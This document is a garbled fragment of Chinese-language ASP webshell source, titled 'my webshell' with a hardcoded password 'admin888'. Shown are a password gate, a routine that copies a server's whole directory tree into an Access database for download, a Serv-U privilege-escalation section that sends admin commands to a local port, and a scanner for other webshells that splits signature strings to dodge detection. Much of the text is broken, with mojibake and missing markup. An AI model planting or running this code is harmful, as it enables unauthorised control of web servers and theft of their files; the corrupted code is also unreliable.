<%
Server.ScriptTimeout=10000000
Response.Buffer =true
On Error Resume Next
UserPass="admin888"
mName="my webshell"
Response.Buffer =true
On Error Resume Next
sub ShowErr()
If Err Then
RRS" " & Err.Description & " "
Err.Clear:Response.Flush
End If
end sub
Sub RRS(str)
response.write(str)
End Sub
Function RePath(S)
RePath=Replace(S,"\","\\")
End Function
Function RRePath(S)
RRePath=Replace(S,"\\","\")
End Function
URL=Request.ServerVariables("URL")
ServerIP=Request.ServerVariables("LOCAL_ADDR")
Action=Request("Action")
RootPath=Server.MapPath(".")
WWWRoot=Server.MapPath("/")
serveru=request.servervariables("http_host")&url
serverp=userpass
FolderPath=Request("FolderPath")
FName=Request("FName")
BackUrl="
"
RRS Efun&""&serveru&"&p="&serverp&"'>"
End Sub
Sub PageAddToMdb()
Dim theAct,thePath
theAct=Request("theAct")
thePath=Request("thePath")
Server.ScriptTimeOut=5000
If theAct="addToMdb" Then
addToMdb(thePath)
alertThenClose("Y!")
echo ""
Response.End
End If
If theAct="releaseFromMdb" Then
unPack(thePath)
alertThenClose("Y!")
Response.End
End If
echo "而ㅼ찈竊?br/>"
echo ""
echo "?⑷?(FSO): "
echo ""
End Sub
Sub addToMdb(thePath)
If isDebugMode=False Then
On Error Resume Next
End If
Dim rs,conn,stream,connStr,adoCatalog
Set rs=Server.CreateObject("ADODB.RecordSet")
Set stream=Server.CreateObject("ADODB.Stream")
Set conn=Server.CreateObject("ADODB.Connection")
Set adoCatalog=Server.CreateObject("ADOX.Catalog")
connStr="Provider=Microsoft.Jet.OLEDB.4.0; Data Source="&Server.MapPath("HYTop.mdb")
adoCatalog.Create connStr
conn.Open connStr
conn.Execute("Create Table FileData(Id int IDENTITY(0,1) PRIMARY KEY CLUSTERED,thePath VarChar,fileContent Image)")
stream.Open
stream.Type=1
rs.Open "FileData",conn,3,3
If Request("theMethod")="fso" Then
fsoTreeForMdb thePath,rs,stream
Else
saTreeForMdb thePath,rs,stream
End If
rs.Close
Conn.Close
stream.Close
Set rs=Nothing
Set conn=Nothing
Set stream=Nothing
Set adoCatalog=Nothing
End Sub
dim fsoX,saX
Set saX=Server.CreateObject(ObT(14,0))
set fsoX=Server.CreateObject(ObT(0,0))
Function fsoTreeForMdb(thePath,rs,stream)
Dim item,theFolder,folders,files,sysFileList
sysFileList="$HYTop.mdb$HYTop.ldb$"
' If fsoX.FolderExists(thePath)=False Then
' showErr(thePath&"?λ쵖")
' End If
Set theFolder=fsoX.GetFolder(thePath)
Set files=theFolder.Files
Set folders=theFolder.SubFolders
For Each item In folders
fsoTreeForMdb item.Path,rs,stream
Next
For Each item In files
If InStr(sysFileList,"$"&item.Name&"$") <=0 Then
rs.AddNew
rs("thePath")=Mid(item.Path,4)
stream.LoadFromFile(item.Path)
rs("fileContent")=stream.Read()
rs.Update
End If
Next
Set files=Nothing
Set folders=Nothing
Set theFolder=Nothing
End Function
Sub saTreeForMdb(thePath,rs,stream)
Dim item,theFolder,sysFileList
sysFileList="$HYTop.mdb$HYTop.ldb$"
Set theFolder=saX.NameSpace(thePath)
For Each item In theFolder.Items
If item.IsFolder=True Then
saTreeForMdb item.Path,rs,stream
Else
If InStr(sysFileList,"$"&item.Name&"$") <=0 Then
rs.AddNew
rs("thePath")=Mid(item.Path,4)
stream.LoadFromFile(item.Path)
rs("fileContent")=stream.Read()
rs.Update
End If
End If
Next
Set theFolder=Nothing
End Sub
if session("vipha2dmin")<>UserPass then
if request.form("pass")<>"" then
if request.form("pass")=UserPass then
session("vipha2dmin")=UserPass
response.redirect url
else
rrs"
"
RRS""
case 3
set c=Server.CreateObject("Microsoft.XMLHTTP")
a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s3", True, "", ""
a.send loginuser & loginpass & mt & deldomain & quit
set session("a")=a
RRS"
?딇솃堊쏄톬,甸썹뜷甸됱즲痢깆쫰竊?br>"&cmd&"
"
RRS""
RRS"
"
case else
on error resume next
set a=session("a")
set b=session("b")
set c=session("c")
a.abort
Set a = Nothing
b.abort
Set b = Nothing
c.abort
Set c = Nothing
RRS"
"
RRS"
"
RRS"
"
RRS"
Serv-U ?딈걶?덃럹 viph曆싩뿰寃?/td>"
RRS"
"
RRS"
"
RRS"
?곕뭇痢?
"
RRS"
"
RRS"
"
RRS"
"
RRS"
??利덌폏
"
RRS"
"
RRS"
"
RRS"
"
RRS"
????폏
"
RRS"
"
RRS"
"
RRS"
"
RRS"
繹앭쎓夷뚯벟竊?/td>"
RRS"
"
RRS"
"
RRS"
"
RRS"
痢긱利덌폏
"
RRS"
"
RRS"
"
RRS"
"
RRS"
"
RRS""
RRS"
"
RRS"
"
end select
function Gpath()
on error resume next
err.clear
set f=Server.CreateObject("Scripting.FileSystemObject")
if err.number>0 then
gpath="c:"
exit function
end if
gpath=f.GetSpecialFolder(0)
gpath=lcase(left(gpath,2))
set f=nothing
end function
'?而곸?
Case "kmuma"
dim Report
if request.QueryString("act")<>"scan" then
RRS ("縕®콇紐쎌빱姨?/b>- "&Server.MapPath("/")&" ")
RRS ("援띕꼱?쇱빱姨?/b>- "&Server.MapPath("."))
RRS "
"
else
if request.Form("path")="" then
RRS("夷뚯벟瑗뉗퐯礪⑥솗")
response.End()
end if
if request.Form("path")="\" then
TmpPath = Server.MapPath("\")
elseif request.Form("path")="." then
TmpPath = Server.MapPath(".")
else
TmpPath = request.Form("path")
end if
timer1 = timer
Sun = 0
SumFiles = 0
SumFolders = 1
If request.Form("radiobutton") = "sws" Then
DimFileExt = "asp,cer,asa,cdx"
Call ShowAllFile(TmpPath)
Else
If request.Form("path") = "" or request.Form("Search_Date") = "" or request.Form("Search_FileExt") = "" Then
RRS("?꾧뺀岳귥댂瑗뉏풘??br> ?앸읉?쇠러?ㅶ릿??/a>")
response.End()
End If
DimFileExt = request.Form("Search_fileExt")
Call ShowAllFile2(TmpPath)
End If
RRS "
"
If request.Form("radiobutton") = "sws" Then
RRS "
?≪댂若?슕夷뚯벟
"
RRS "
??앹?
"
RRS "
痍꾤뵖
"
RRS "
?쇱돁/??㎗?귥뇤
"
else
RRS "
?≪댂若?슕夷뚯벟
"
RRS "
?≪댂?쇱돁?귥뇤
"
RRS "
??㎗?귥뇤
"
end if
RRS "
"
RRS Report
RRS "
"
timer2 = timer
thetime=cstr(int(((timer2-timer1)*10000 )+0.5)/10)
RRS " 援뜹Ⅳ?듸쨯臾양뿰二?&thetime&"遊먯랬"
end if
Sub ShowAllFile(Path)
Set F1SO = CreateObject("Scripting.FileSystemObject")
if not F1SO.FolderExists(path) then exit sub
Set f = F1SO.GetFolder(Path)
Set fc2 = f.files
For Each myfile in fc2
If CheckExt(F1SO.GetExtensionName(path&"\"&myfile.name)) Then
Call ScanFile(Path&Temp&"\"&myfile.name, "")
SumFiles = SumFiles + 1
End If
Next
Set fc = f.SubFolders
For Each f1 in fc
ShowAllFile path&"\"&f1.name
SumFolders = SumFolders + 1
Next
Set F1SO = Nothing
End Sub
Sub ScanFile(FilePath, InFile)
Server.ScriptTimeout=999999999
If InFile <> "" Then
Infiles = "留▼뙜??뎨"& InFile & "?≪댂愿踰든뜷甸?/font>"
End If
Set FSO1s = CreateObject("Scripting.FileSystemObject")
on error resume next
set ofile = FSO1s.OpenTextFile(FilePath)
filetxt = Lcase(ofile.readall())
If err Then Exit Sub end if
if len(filetxt)>0 then
filetxt = vbcrlf & filetxt
temp = ""&replace(FilePath,server.MapPath("\")&"\","",1,1,1)&" "
temp=temp&"湲띿꽌 "
temp=temp&"?앸뇸 "
temp=temp&"由욥숯 "
temp=temp&"甸노븸"
If instr( filetxt, Lcase("WScr"&DoMyBest&"ipt.Shell") ) or Instr( filetxt, Lcase("clsid:72C24DD5-D70A"&DoMyBest&"-438B-8A42-98424B88AFB8") ) then
Report = Report&"
"
Sun = Sun + 1
temp="-=| 瘟운?|=-"
End if
If instr( filetxt, Lcase("She"&DoMyBest&"ll.Application") ) or Instr( filetxt, Lcase("clsid:13709620-C27"&DoMyBest&"9-11CE-A49E-444553540000") ) then
Report = Report&"
"
Sun = Sun + 1
temp="-=| 瘟운?|=-"
End If
Set regEx = New RegExp
regEx.IgnoreCase = True
regEx.Global = True
regEx.Pattern = "\bLANGUAGE\s*=\s*[""]?\s*(vbscript|jscript|javascript).encode\b"
If regEx.Test(filetxt) Then
Report = Report&"